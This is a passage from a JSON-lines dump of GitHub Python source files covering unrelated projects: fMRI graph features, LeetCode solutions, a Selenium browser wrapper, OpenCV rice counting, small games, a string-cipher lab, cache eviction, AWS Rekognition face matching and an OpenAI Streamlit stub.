**k)\r\n#np.load = lambda *a,**k: np_load_old(*a,allow_pickle=True)\r\n\r\n#os.chdir('C:\\\\Users\\\\mmousa4\\\\OneDrive - Louisiana State University\\\\Final_codes\\\\Sections\\\\NewResults')\r\n#train_feature= np.load('ExpandfMRI_UNET2D_VGG162D.npy')\r\n#final_labels_train_3d = np.load('final_labels_train_3d.npy')\r\n#\r\n#corr_den= np.load('corr_den.npy')\r\n#from nilearn.connectome import GroupSparseCovarianceCV,sym_matrix_to_vec,ConnectivityMeasure\r\n#connectivities = sym_matrix_to_vec(corr_den, discard_diagonal=True)\r\n#final_labels = np.load('final_labels.npy')\r\n\r\n#ts_canica = np.load('ts_canica.npy')\r\n#covariences= np.load('canica_GL_covariences.npy')\r\nprefix = 'aal_corr_den'\r\nfrom nilearn.connectome import GroupSparseCovarianceCV,sym_matrix_to_vec,ConnectivityMeasure\r\ncorrelations= np.load(prefix+'.npy')\r\n\r\n#connectivities = sym_matrix_to_vec(covariences, discard_diagonal=True)\r\n#final_labels = np.load('final_labels.npy')\r\n#ind = 
np.load('indx_rus_9_646431.npy')\r\n#connectivities=connectivities[ind]\r\n##final_labels=final_labels[ind]\r\n#covariences = covariences[ind]\r\n#%%\r\n#correlations=np.array(cov,dtype='float16') \r\n#correlations= corr_den\r\n#correlations=covariences\r\n\r\nfv_list=[]\r\n#nNodes = []\r\ndf = pd.DataFrame()\r\n\r\nfor i in range (0,correlations.shape[0]):\r\n \r\n graph = CreateGraph(correlations[i,:,:])\r\n# print(graph)\r\n fv,column = feature_vector2(graph)\r\n df1 = pd.DataFrame([fv], columns =list(column)) \r\n df = df.append(df1, sort = False)\r\ndf = df.reset_index(drop=True)\r\ngraphFeatures = df.values\r\n\r\n#df.to_csv('graphdf_canica.csv')\r\n#np.save('graphFeatures_canica.npy',np.array(graphFeatures,dtype='float16'))\r\n#np.save('graphFeatures_SpectrumDensity.npy',np.array(graphFeatures,dtype='float16'))\r\nnp.save(prefix+'graphFeatures.npy',np.array(graphFeatures,dtype='float16'))\r\n\r\n","repo_name":"moosavianmz/DetectingDepression","sub_path":"Workflow/2-Feature Extraction/4-1-GraphFeatures.py","file_name":"4-1-GraphFeatures.py","file_ext":"py","file_size_in_byte":15984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36763117373","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Problem\n# \n# Given a collection of candidate numbers (candidates) and a target number (target), find all unique combinations in candidates where the candidate numbers sums to target. Each number in candidates may only be used once in the combination.\n# \n# Note:\n# - All numbers (including target) will be positive integers.\n# - The solution set must not contain duplicate combinations.\n# \n# Example 1:
    \n# Input: candidates = [10,1,2,7,6,1,5], target = 8,
    \n# A solution set is:
    \n# [\n# [1, 7],\n# [1, 2, 5],\n# [2, 6],\n# [1, 1, 6]\n# ]\n# \n# Example 2:
    \n# Input: candidates = [2,5,2,1,2], target = 5,
    \n# A solution set is:
    \n# [\n# [1,2,2],\n# [5]\n# ]\n\n\n# Solution 1\n# dfs using list slicing\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n if not candidates:\n return []\n \n candidates.sort()\n \n result = []\n temp_list = []\n self.helper(candidates, temp_list, result, target)\n return result\n \n def helper(self, candidates, temp_list, result, target):\n \n if sum(temp_list) == target:\n result.append(temp_list)\n return\n \n elif sum(temp_list) < target:\n for i, candidate in enumerate(candidates):\n if candidates[i] == candidates[i-1] and i != 0:\n continue\n else:\n self.helper(candidates[i+1:], temp_list+[candidate], result, target)\n \n else:\n return\n \n \n# Solution 2\n# dfs using indices\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n \n candidates.sort()\n all_subsets = []\n subset = []\n start_index = 0\n return self.helper(candidates, target, start_index, subset, all_subsets)\n \n def helper(self, candidates, target, start_index, subset, all_subsets):\n \n if sum(subset) > target:\n return\n elif sum(subset) == target:\n all_subsets.append(subset)\n return\n \n for i in range(start_index, len(candidates)):\n if candidates[i] == candidates[i-1] and i > start_index:\n continue\n \n self.helper(candidates, target, i+1, subset+[candidates[i]], all_subsets)\n \n return all_subsets\n\n\n# Solution 3: Backtracking\n\ndef combination_sum2_backtrack(candidates, target):\n subsets = []\n candidates.sort(reverse=True)\n backtrack(candidates, target, 0, [], subsets)\n return subsets\n\ndef backtrack(candidates, target, start, templist, subsets):\n if target == 0:\n subsets.append(templist[:])\n \n elif target > 0:\n for i in range(start, len(candidates)):\n if i > start and candidates[i] == candidates[i-1]:\n continue\n templist.append(candidates[i])\n backtrack(candidates, target-candidates[i], i+1, templist, subsets)\n templist.pop() \n\n\n# # Solution 4: bottom up dynamic programming\n\ndef combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n aux = [set() for i in range(target + 1)]\n aux[0].add(())\n for candidate in candidates:\n for subtarget in range(target, candidate - 1, -1):\n for prev in aux[subtarget - candidate]:\n aux[subtarget].add(prev + (candidate,))\n return list(aux[-1])\n\n","repo_name":"shanminlin/Leetcode","sub_path":"array/permutation_combination/40_Combination_Sum_II.py","file_name":"40_Combination_Sum_II.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"4772873327","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/7/11\n# @Author : Mik\nfrom typing import Union, Type\nfrom selenium.webdriver import *\nfrom selenium.webdriver.opera.options import Options as OperaOptions\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom setting import *\nfrom utils.logs import logger\n\n# 自定义异常参数\nBROWSERS = (Chrome, Ie, Firefox, Edge, Opera, Safari)\nOPTIONS = (ChromeOptions, IeOptions, FirefoxOptions, EdgeOptions, OperaOptions)\n\n\nclass BrowserTypeError(Exception):\n \"\"\"\n 自定义异常类\n \"\"\"\n\n def __init__(self, _type):\n self._type = _type\n\n def __str__(self):\n return f'Unsupported browser parameters:{self._type}'\n\n\nclass Browser:\n # 浏览器驱动路径\n REMOTE_EXECUTOR = COMMAND_REMOTE_EXECUTOR\n CHROME_DRIVER_PATH = CHROME_DRIVER_PATH\n FIREFOX_DRIVER_PATH = FIREFOX_DRIVER_PATH\n 
EDGE_DRIVER_PATH = EDGE_DRIVER_PATH\n OPERA_DRIVER_PATH = OPERA_DRIVER_PATH\n IE_DRIVER_PATH = IE_DRIVER_PATH\n\n # 启动grid配置\n\n def __init__(self, browser_type: Type[Union[Chrome, Ie, Firefox, Edge, Opera, Safari]] = Chrome,\n option_type: Type[\n Union[FirefoxOptions, ChromeOptions, IeOptions, EdgeOptions, OperaOptions]] = ChromeOptions,\n driver_path: str = CHROME_DRIVER_PATH):\n if not issubclass(browser_type, BROWSERS): # 异常处理\n raise BrowserTypeError(browser_type) # TypeError\n if not issubclass(option_type, OPTIONS):\n raise BrowserTypeError(option_type)\n if not isinstance(driver_path, str):\n raise TypeError\n self._driver = browser_type\n self._option = option_type\n self._path = driver_path\n self._remote = Remote\n\n\nclass MyChrome(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MyChrome, self).__init__(\n )\n\n @property\n def _option1(self):\n \"\"\"\n chrome浏览器特有的操作属性\n :return:\n \"\"\"\n prefs = {\n \"credentials_enable_service\": False,\n \"profile.password_manager_enabled\": False,\n \"profile.default_content_settings.popups\": 0 # 禁用下载弹窗\n }\n\n chrome_experimental = {\n # 'mobileEmulation': {'deviceName': 'iPhone 6'}, # 设置手机模式\n 'excludeSwitches': ['enable-automation'], # 反爬设置\n }\n\n chrome_option = self._option() # 获取chrome_option实例\n chrome_option.headless = False\n chrome_option.add_argument('--disable-gpu') # 禁bug,谷歌推荐参数\n chrome_option.add_argument('--ignore-certificate-errors') # 禁用ssl证书\n chrome_option.add_experimental_option(\"prefs\", prefs)\n for k, v in chrome_experimental.items():\n chrome_option.add_experimental_option(k, v)\n return chrome_option\n\n def browser(self, option_id: int):\n \"\"\"\n 启动chrome浏览器进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK: # 判断是否启动GRID\n chrome = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.CHROME.copy(),\n options=option)\n else:\n chrome = self._driver(executable_path=self._path, options=option)\n chrome.maximize_window()\n return chrome\n\n\nclass IE(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(IE, self).__init__(\n browser_type=Ie,\n option_type=IeOptions,\n driver_path=super().IE_DRIVER_PATH\n\n )\n\n @property\n def _option1(self):\n \"\"\"\n ie浏览器特有的操作属性\n :return:\n \"\"\"\n ie_option = self._option()\n ie_option.browser_attach_timeout = 10000 # ie页面超时时间\n ie_option.ensure_clean_session = True # ie浏览器清空本地会话\n return ie_option\n\n def browser(self, option_id: int):\n \"\"\"\n 启动ie浏览器并进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK:\n ie = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.INTERNETEXPLORER.copy(),\n options=option)\n else:\n ie = self._driver(executable_path=self._path, options=option)\n\n ie.maximize_window()\n return ie\n\n\nclass MyFirefox(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MyFirefox, self).__init__(\n browser_type=Firefox,\n option_type=FirefoxOptions,\n driver_path=super().FIREFOX_DRIVER_PATH\n )\n\n @property\n def _option1(self):\n \"\"\"\n firefox浏览器特有的操作属性\n :return:\n \"\"\"\n firefox_option = self._option() # 获取chrome_option实例\n firefox_option.headless = False\n return firefox_option\n\n def browser(self, option_id: int):\n \"\"\"\n 
启动firefox浏览器并进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK: # 判断是否启动GRID\n firefox = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.FIREFOX.copy(),\n options=option)\n else:\n firefox = self._driver(executable_path=self._path, options=option,\n service_log_path=FIREFOX_SERVICE_LOG_PATH)\n\n firefox.maximize_window()\n return firefox\n\n\nclass MyEdge(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MyEdge, self).__init__(\n browser_type=Edge,\n option_type=EdgeOptions,\n driver_path=super().EDGE_DRIVER_PATH\n )\n\n @property\n def _option1(self):\n \"\"\"\n ie浏览器特有的操作属性\n :return:\n \"\"\"\n edge_option = self._option()\n edge_option.page_load_strategy = 'normal'\n return edge_option\n\n def browser(self, option_id):\n \"\"\"\n 启动edge浏览器并进行初始配置\n :return:\n \"\"\"\n if option_id == 0:\n option = None\n elif option_id == 1:\n option = self._option1\n else:\n raise ValueError('Option id error')\n\n if self.GRID_MARK:\n edge = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.EDGE.copy(),\n options=option)\n else:\n edge = self._driver(executable_path=self._path, options=option)\n\n edge.maximize_window()\n return edge\n\n\nclass MySafari(Browser):\n\n def __init__(self, grid):\n self.GRID_MARK = grid\n super(MySafari, self).__init__(\n browser_type=Safari,\n )\n\n @property\n def browser(self):\n \"\"\"\n 启动edge浏览器并进行初始配置\n :return:\n \"\"\"\n if self.GRID_MARK:\n safari = self._remote(command_executor=self.REMOTE_EXECUTOR,\n desired_capabilities=DesiredCapabilities.SAFARI.copy())\n else:\n safari = self._driver()\n safari.maximize_window()\n return safari\n","repo_name":"lztzl/project1","sub_path":"common/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34574791703","text":"import pickle\nimport struct\nimport msgpack\n\n\ndef read_data(input_path: str, save_set: bool = True):\n with open(input_path, 'rb') as file:\n data = list(file.read())\n\n data_set = set(data) if save_set else None\n return data, data_set\n\n\ndef write_data(output_path: str, data: list) -> None:\n with open(output_path, 'wb') as f:\n for item in data:\n f.write(item.to_bytes(1, 'big'))\n\n# def write_encoded_data(output_path: str, obj)->None:\n# with open(output_path, \"wb\") as f:\n# pickle.dump(obj, f)\n\n\ndef write_encoded_data(output_path: str, data: list, data_set: list = None) -> None:\n\n packed_data = bytearray(b''.join(struct.pack(' 100: # Eşik değeri ile oynayarak pirinç tanelerini belirlenebilir\r\n pirinc_sayisi += 1\r\n cv2.drawContours(frame, [kontur], -1, (0, 255, 0), 2)\r\n\r\n print(f\"Pirinç Taneleri Sayısı: {pirinc_sayisi}\")\r\n\r\n return frame\r\n\r\n# Kamerayı açma\r\nvideo_capture = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n # Bir sonraki kareyi al\r\n ret, frame = video_capture.read()\r\n\r\n if not ret:\r\n break\r\n\r\n # Pirinç tanelerini sayan fonksiyonu çağır\r\n sonuc_frame = say_pirinc_taneleri(frame)\r\n\r\n # Sonucu göster\r\n cv2.imshow('Pirinç Sayım', sonuc_frame)\r\n\r\n # 'q' tuşuna basılınca döngüden çık\r\n tus = cv2.waitKey(1) & 0xFF\r\n if tus == ord('q'):\r\n break\r\n\r\n# Kamerayı 
kapat\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()\r\n\r\n","repo_name":"ayseck/Goruntu_Isleme","sub_path":"pirinc taneleri hesaplama/pirinc_hesaplama.py","file_name":"pirinc_hesaplama.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2368368497","text":"import pgzrun\nimport random\n\nWIDTH = 800\nHEIGHT = 800\n\nkolory = [\"#A3DDCB\", \"#E8E9A1\", \"#E6B566\", \"#E5707E\"]\n\npilka = {\"x\": WIDTH / 2, \"y\": HEIGHT - 30, \"promien\": 10, \"vy\": 0, \"kolor\": random.choice(kolory)}\n\nlinie = []\n\n\ndef draw():\n screen.fill((0, 0, 0))\n\n pilka_rect = Rect((pilka[\"x\"], pilka[\"y\"]), (pilka[\"promien\"] * 2, pilka[\"promien\"] * 2))\n\n for linia in linie:\n for i in range(len(linia[\"segmenty\"])):\n kolor = linia[\"segmenty\"][i]\n szer = WIDTH / 4\n x = i * szer - linia[\"przes\"]\n y = linia[\"y\"]\n segment = Rect((x, y), (szer, 20))\n screen.draw.filled_rect(segment, kolor)\n\n if segment.colliderect(pilka_rect) and kolor != pilka[\"kolor\"]:\n reset()\n\n screen.draw.filled_circle((pilka[\"x\"], pilka[\"y\"]), pilka[\"promien\"], pilka[\"kolor\"])\n\n\ndef dodaj_linie(y):\n linia = {}\n linia[\"segmenty\"] = kolory[:]\n random.shuffle(linia[\"segmenty\"])\n linia[\"segmenty\"].extend(linia[\"segmenty\"])\n linia[\"przes\"] = 0\n linia[\"vx\"] = random.randint(2, 5)\n linia[\"y\"] = y\n linie.append(linia)\n\n\ndef update():\n global przes\n for linia in linie:\n linia[\"przes\"] += linia[\"vx\"]\n if linia[\"przes\"] >= WIDTH:\n linia[\"przes\"] = 0\n\n pilka[\"vy\"] += 0.5\n pilka[\"y\"] += pilka[\"vy\"]\n\n\ndef on_key_down(key):\n global linia_y\n if key == keys.SPACE:\n pilka[\"vy\"] = -10\n przesun()\n\n\ndef przesun():\n for linia in linie[:]:\n linia[\"y\"] += 20\n if linia[\"y\"] > HEIGHT:\n dodaj_linie(0)\n linie.remove(linia)\n\n\ndef reset():\n global pilka\n linie.clear()\n dodaj_linie(WIDTH / 2)\n dodaj_linie(WIDTH / 5)\n dodaj_linie(-80)\n pilka = {\"x\": WIDTH / 2, \"y\": HEIGHT - 30, \"promien\": 15, \"vy\": 0, \"kolor\": random.choice(kolory)}\n\n\nreset()\npgzrun.go()\n","repo_name":"blackbat13/UniwersytetMlodych","sub_path":"Spotkanie 15/gra2.py","file_name":"gra2.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"44062236093","text":"import structlog\n\nlogger = structlog.get_logger()\n\n\n\"\"\"\nRules:\n A: rock\n B: paper\n C: scissors\n\nA < B < C < A...\n\nMy side:\n X: rock\n Y: paper\n Z: scissors\n\"\"\"\n\n\ndef read_file(name):\n with open(name, \"r\") as file:\n lines = file.readlines()\n return lines\n\n\nclass Turn:\n def __init__(self, line: str):\n self.opponent = line.split(\" \")[0]\n self.myself = line.split(\" \")[1].strip()\n\n def fight(self):\n if self.myself == \"Y\":\n return 3\n elif self.myself == \"Z\":\n return 6\n else:\n return 0\n\n def score(self):\n fight_score = self.fight()\n self_score = 0\n if self.opponent == \"A\":\n if fight_score == 3:\n self_score = 1\n elif fight_score == 0:\n self_score = 3\n else:\n self_score = 2\n elif self.opponent == \"B\":\n if fight_score == 3:\n self_score = 2\n elif fight_score == 6:\n self_score = 3\n else:\n self_score = 1\n else:\n if fight_score == 3:\n self_score = 3\n elif fight_score == 6:\n self_score = 1\n else:\n self_score = 2\n return fight_score + self_score\n\n\ndef create_turns():\n lines = read_file(\"./input.txt\")\n turns = []\n for line in lines:\n 
turns.append(Turn(line))\n\n return turns\n\n\ndef main():\n turns = create_turns()\n total_score = 0\n for turn in turns:\n total_score += turn.score()\n logger.info(\"total_score\", value=total_score)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gheritarish/advent-of-code","sub_path":"2022/02/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15304591943","text":"\"\"\"\r\nCSAPX Lab 1: Secret Messages\r\n\r\nA program that encodes/decodes a message by applying a set of transformation operations.\r\nThe transformation operations are:\r\n shift - Sa[,n] changes letter at index a by moving it n letters fwd in the alphabet. A negative\r\n value for n shifts the letter backward in the alphabet.\r\n rotate - R[n] rotates the string n positions to the right. A negative value for n rotates the string\r\n to the left.\r\n duplicate - Da[,n] follows character at index a with n copies of itself.\r\n trade - Ti,j trades the letter at index i with the letter at index j.\r\n\r\nAll indices number (the subscript parameters) are 0-based.\r\n\r\nauthor: Ethan Hartman\r\n\"\"\"\r\n\r\n\r\ndef shift(msg: str, idx: int, exponent: int = 1):\r\n \"\"\"\r\n Changes a letter at index 'idx' in the string 'msg' by moving it 'exponent' number of letters fwd in the alphabet.\r\n Negative values will shift the letter backwards in the alphabet\r\n :param msg: The message being transformed\r\n :param idx: The location of the letter being shifted\r\n :param exponent: The number of letters we are moving the main letter by.\r\n :return: Transformed string with a shifted letter\r\n \"\"\"\r\n return msg[:idx] + chr((ord(msg[idx]) - ord('A') + 26 + exponent) % 26 + ord('A')) + msg[idx + 1:]\r\n\r\n\r\ndef rotate(msg: str, amount: int = 1):\r\n \"\"\"\r\n Rotates the string 'msg' 'amount' positions to the right. A negative value for 'amount' rotates the string\r\n to the left\r\n :param msg: The message being rotated\r\n :param amount: The amount of characters being rotated\r\n :return: Transformed string with rotated letters.\r\n \"\"\"\r\n return msg[-amount:] + msg[:-amount]\r\n\r\n\r\ndef duplicate(msg: str, idx: int, copies: int = 1):\r\n \"\"\"\r\n Duplicates a character at 'idx' with 'copies' copies of itself\r\n If 'copies' < 0, that number of copies will be removed from the string\r\n :param msg: The message with a duplication\r\n :param idx: The location of the letter being duplicated\r\n :param copies: The number of copies we would like made\r\n :return: Transformed string with duplicated letters.\r\n \"\"\"\r\n if copies >= 0:\r\n return msg[:idx] + msg[idx] * copies + msg[idx:]\r\n else:\r\n return msg[:idx] + msg[idx-copies:]\r\n\r\n\r\ndef trade(msg: str, idx: int, swap_idx: int):\r\n \"\"\"\r\n Trades two characters at index 'idx' and 'swap_idx' with each other. 
We assume i < j\r\n :param msg: The message with a desired trade\r\n :param idx: The index of the first trade character\r\n :param swap_idx: The index of the second trade character\r\n :return: Swapped message string\r\n \"\"\"\r\n return msg[:idx] + msg[swap_idx] + msg[idx + 1:swap_idx] + msg[idx] + msg[swap_idx + 1:]\r\n\r\n\r\ndef transform(msg: str, operation_str: str, encrypt: bool):\r\n \"\"\"\r\n Transforms a given string, msg based on the given operations and the boolean, encrypt.\r\n Operations are parsed and their associated operation will be called with the given arguments\r\n The resultant string is returned\r\n :param msg: The message being transformed\r\n :param operation_str: The operations which will be executed\r\n :param encrypt: If we are encrypting or decrypting\r\n :return: The transformed message\r\n \"\"\"\r\n operations = operation_str.split(';')\r\n encrypt_mult = 1\r\n if not encrypt:\r\n # Decrypting requires reversed operations\r\n operations.reverse()\r\n encrypt_mult = -1\r\n\r\n for operation in operations:\r\n operation_name = operation[0]\r\n comma = operation.find(',')\r\n operation_method = None\r\n # assign an operation function\r\n if operation_name == \"S\":\r\n operation_method = shift\r\n elif operation_name == \"R\":\r\n operation_method = rotate\r\n elif operation_name == \"D\":\r\n operation_method = duplicate\r\n elif operation_name == \"T\":\r\n operation_method = trade\r\n\r\n # Determine parameters and call the operation method with those parameters\r\n if comma != -1:\r\n # Two parameters\r\n param1, param2 = int(operation[1:comma]), int(operation[comma + 1:])\r\n # T will not be changed between encrypting or decrypting\r\n msg = operation_method(msg, param1, param2 * encrypt_mult if operation_name != \"T\" else param2)\r\n elif len(operation) > 1:\r\n # One parameter\r\n param = int(operation[1:])\r\n if encrypt:\r\n # Normal case\r\n msg = operation_method(msg, param)\r\n elif operation_name == \"R\":\r\n # Rotate decrypt case. 'param' must be negated\r\n msg = operation_method(msg, param * encrypt_mult)\r\n else:\r\n # Other decrypt cases.\r\n msg = operation_method(msg, param, encrypt_mult)\r\n else:\r\n # No parameters given can only mean 'rotate'.\r\n msg = rotate(msg, encrypt_mult)\r\n return msg\r\n\r\n\r\ndef main() -> None:\r\n \"\"\"\r\n The main loop responsible for getting the input details from the user\r\n and printing in the standard output the results\r\n of encrypting or decrypting the message applying the transformations\r\n :return: None\r\n \"\"\"\r\n print(\"Welcome to Secret Messages!\")\r\n option = input(\"What do you want to do: (E)ncrypt, (D)ecrypt or (Q)uit? \")\r\n\r\n # Loop until the user chooses \"Q\"\r\n while option != \"Q\":\r\n if option != \"Q\":\r\n msg = input(\"Enter the message: \")\r\n operation_str = input(\"Enter the encrypting transformation operations: \")\r\n print(\"Generating output ...\")\r\n print(transform(msg, operation_str, option == \"E\"))\r\n\r\n option = input(\"What do you want to do: (E)ncrypt, (D)ecrypt or (Q)uit? 
\")\r\n\r\n print(\"Goodbye!\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"theeman05/School-Projects","sub_path":"RIT/CSCI 242/Lab1/src/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":5862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36630005508","text":"configuration = {\n 'stock_code_dict' : {\n 'Nikko AM STI ETF': 'G3B.SI', \n 'Lion Phillip S REIT ETF': 'CLR.SI',\n 'DBS Group Holdings Ltd': 'D05.SI',\n 'UOB': 'U11.SI', \n 'Invesco DB Silver Fund': 'DBS',\n 'Alphabet Inc.': 'GOOG', \n 'Apple Inc': 'AAPL',\n 'OCBC': 'O39.SI', \n 'Bitcoin USD': 'BTC-USD',\n 'Lion OCBC HS TECH ETF': 'HST.SI',\n 'NetFlix': 'NFLX',\n 'Microsoft': 'MSFT',\n 'Amazon': 'AMZN',\n 'Tesla': 'TSLA',\n 'AMC Entertainment Holdings Inc': 'AMC',\n 'Semileds Corp': 'LEDS',\n 'Harpoon Therapeutics Inc': 'HARP',\n 'Senseonics Holdings, Inc': 'SENS'\n },\n 'options_dict' : {\n 'stock/crypto/etf': \n [\n 'Invesco DB Silver Fund', \n 'Apple Inc', \n 'Alphabet Inc.', \n 'Nikko AM STI ETF', \n 'DBS Group Holdings Ltd',\n 'Lion Phillip S REIT ETF',\n 'UOB', \n 'OCBC', \n 'Bitcoin USD', \n 'Lion OCBC HS TECH ETF', \n 'NetFlix', \n 'Microsoft', \n 'Amazon', \n 'Tesla', \n 'AMC Entertainment Holdings Inc', \n 'Semileds Corp', \n 'Harpoon Therapeutics Inc',\n 'Senseonics Holdings, Inc'\n ],\n 'period': \n [\n '1d', '5d', '1wk', '1mo', '3mo', '9mo', '12mo', '36mo', '120mo', '240mo'\n ],\n 'interval': \n [\n '1m', '2m', '5m', '15m', '30m', '90m', '1h', '1d'\n ],\n 'moving average': \n [\n 'NIL', 50, 100, 200\n ],\n 'chart type': \n [\n 'Default', 'Candlestick', 'OHLC'\n ]\n },\n 'discrete_colours' : \n [\n '#FE00FA', '#0DF9FF', '#FF0092', '#22FFA7'\n ]\n}","repo_name":"KevinTan1203/Self-Initiated-Projects","sub_path":"Stock Visualisation/codeName.py","file_name":"codeName.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39224604484","text":"#simplified cache eviction using farthest-in-future approach\nimport random\nfrom datetime import datetime\n\nresources = ['a','b','c','d','e','f']\n\ndef createMemRef(n):\n #creates a list of n random memory references\n #a memory reference is a list of requests for certain resources\n #resources here will be from the set {a,b,c,d,e,f}\n random.seed(datetime.now())\n refList = []\n for i in range(0,n):\n currResource = random.choice(resources)\n refList.append(currResource)\n return refList\n\ndef farthestInFuture(n,k):\n #creates a random memory reference list of len n\n #creates a cache of size k (k < n)\n #generates an eviction list that minimizes the number of cache misses\n #a miss occurs when a resource is requested that is not in the cache\n #typically initially fill the cache with random elements from resources\n #to make analysis easier assume cache always starts with first k letters of alphabet\n evictionList = []\n #the eviction list will consist of tuples of the following form\n #(time the eviction occured, element removed from cache, element added)\n currCache = []\n for i in range(0,k):\n currCache.append(resources[i])\n memList = createMemRef(n)\n print(memList)\n for i in range(0,len(memList)):\n if memList[i] in currCache:\n continue\n else:\n #find element in cache that is needed the farthest in the future from now\n farthestAwayTime = 0\n farthestAwayElement = currCache[0]\n for j in currCache:\n if j in memList[i+1:]:\n currAwayTime = 
memList.index(j,i+1)\n else:\n currAwayTime = 100 #if we never need this element again then we know it's very 'far' away\n if currAwayTime > farthestAwayTime:\n farthestAwayTime = currAwayTime\n farthestAwayElement = j\n currEviction = (i, farthestAwayElement, memList[i])\n currCache.remove(farthestAwayElement) #remove farthest element from cache\n currCache.append(memList[i]) #add newest element to cache\n evictionList.append(currEviction)\n return evictionList\n\n\na = farthestInFuture(7,3)\nprint(a)","repo_name":"willjrowe/algorithmDesign","sub_path":"cacheEviction.py","file_name":"cacheEviction.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72731539974","text":"from os import system, name\nimport boto3\nimport time\nfrom multiprocessing import Process\n\n\n# POC code written to look through family photos and find who a specific person looks like\n# The idea being that if you have 30 photos of relatives (both living and dead), you can run this\n# code to see who the person in the image_to_compare looks the most like\n# This code was split out into several threads to help with the speed\n\nbucket_name = 'bucket_name' #Replace with your bucket name\ns3_prefix = 's3_prefix' #Replace with your S3 prefix containing family images\nimage_to_compare = 'image.jpg' #Replace with the person you want to do the comparisons for\nmax_threshold = 15 #Set a low max_threshold because we're comparing a person to other people--not\n #other photos of themselves\n\ndef findMatch(fileName, key):\n try:\n rek_client = boto3.client('rekognition')\n match = rek_client.compare_faces(SourceImage={'S3Object':{'Bucket':bucket_name,'Name':fileName}},\n TargetImage={'S3Object':{'Bucket':bucket_name,'Name':key}},\n SimilarityThreshold=max_threshold)\n if len(match['FaceMatches']) > 0:\n print ('Face: %s (%4.2f%%)' % (key, match['FaceMatches'][0]['Similarity']))\n #else:\n # print('Face: %s - NO MATCH' % (key))\n except:\n print('Invalid image %s' % (key))\n\n#detect a face\ndef detectFace(prefix, fileName):\n #Check to see if the found face matches a face in our Rekognition database\n processes = []\n s3_client = boto3.client('s3')\n response = s3_client.list_objects(Bucket=bucket_name, Prefix=prefix)\n\n #Loop over the photos in our bucket, but do this mutlithreaded to make it fast!\n for item in response['Contents']:\n p = Process(target=findMatch, args=(fileName, item['Key'],))\n p.start()\n processes.append(p)\n\n for process in processes:\n process.join()\n\n\nif __name__ == '__main__':\n start_time = time.time()\n\n detectFace(s3_prefix, image_to_compare)\n\n elapsed_time = time.time() - start_time\n print('Elapsed time: %d seconds' % (elapsed_time))\n","repo_name":"ueberhund/ml-examples","sub_path":"ai/rekognition-comparefaces-poc.py","file_name":"rekognition-comparefaces-poc.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72718178372","text":"import openai\nimport streamlit as st\nfrom streamlit_chat import message\nimport re\nimport os\nimport json\n\n# This will raise an error if the environment variable is not set\nif not os.getenv('OPENAI_API_KEY'):\n raise ValueError(\"Missing OPENAI_API_KEY environment variable\")\n\nopenai.api_key = os.getenv('OPENAI_API_KEY')\n\ndef generate_response(prompt):\n prompt = \"Give me a hexcode which matches with the following\"\n\n try:\n completion = 
